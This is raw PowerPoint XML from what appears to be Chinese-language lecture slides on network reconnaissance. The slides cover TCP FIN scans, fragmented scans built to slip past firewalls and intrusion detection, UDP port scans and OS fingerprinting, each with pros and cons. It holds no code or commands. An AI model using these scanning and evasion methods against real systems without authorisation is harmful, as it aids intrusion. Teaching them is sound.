                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3379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808"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33808"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="72" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="73" presetID="17" presetClass="entr" presetSubtype="10" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="33809"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33809"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33809"/>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33810"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33810"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33810"/>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796" grpId="0" animBg="1"/>
      <p:bldP spid="33797" grpId="0" animBg="1"/>
      <p:bldP spid="33798" grpId="0" animBg="1"/>
      <p:bldP spid="33799" grpId="0" animBg="1"/>
      <p:bldP spid="33800" grpId="0" animBg="1"/>
      <p:bldP spid="33801" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33802" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33803" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33805" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33807" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33808" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33809" grpId="0" animBg="1"/>
      <p:bldP spid="33810" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33811" grpId="0" animBg="1"/>
      <p:bldP spid="33812" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>向目标主机端口发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包到达关闭端口会被丢掉，并返回一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若到达开放端口，只简单丢掉，不返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>优点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三次握手协议任何部分，无法记录，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求由超级用户或者授权用户访问专门的系统调用；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>适用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目标主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Windows95/NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>环境下无效：不论端口是否打开，操作系统都返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342018" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP FIN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0B8C2254-116A-492B-88DE-E9144E5B43E2}"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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>将扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分组头分为若干小段，放入不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分片中，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>再通过重叠乱序等特殊方法使每个分片都不含有敏感信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使一些防护系统无法正确重组而不能有效阻止攻击，目标主机则可正常重组，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>优点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>隐蔽性好，可穿越防火墙</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可能被丢弃；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>某些程序在处理这些小数据包时会出现异常。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分段扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B8FACA62-70A9-4EB6-8BD7-F2D671324648}"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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>向目标端口发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端口关闭，会触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP port unreachable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>优点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完成对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口的探测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统管理员的权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描结果可靠性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>高，没收到应答，有可能数据报传丢了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描速度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>很</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>慢，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>RFC1812</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>报文生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>速度做出了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>限制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394246" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端口扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B97BCA6C-3187-40AD-BE8E-D1DAE775EF9E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>许多漏洞是系统相关的，且往往与相应的版本对应。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主要技术： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主动协议栈指纹识别</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>被动协议栈指纹识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>操作系统识别</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normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>向目标主机发送特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包，并检查其响应，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>依据其响应的不同判别操作系统的类型和版本。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>常用的手段：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>顺序检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项），针对开放端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项），针对开放端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># SYN|FIN|URG|PSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项），针对开放端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项），针对开放端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项），针对封闭端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项），针对封闭端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># SYN|FIN|URG|PSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项），针对封闭端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t># UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包，针对封闭端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20482" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主动协议栈指纹识别</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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>被动监测网络通信确定操作系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不同操作系统对</a:t>
            </a:r>
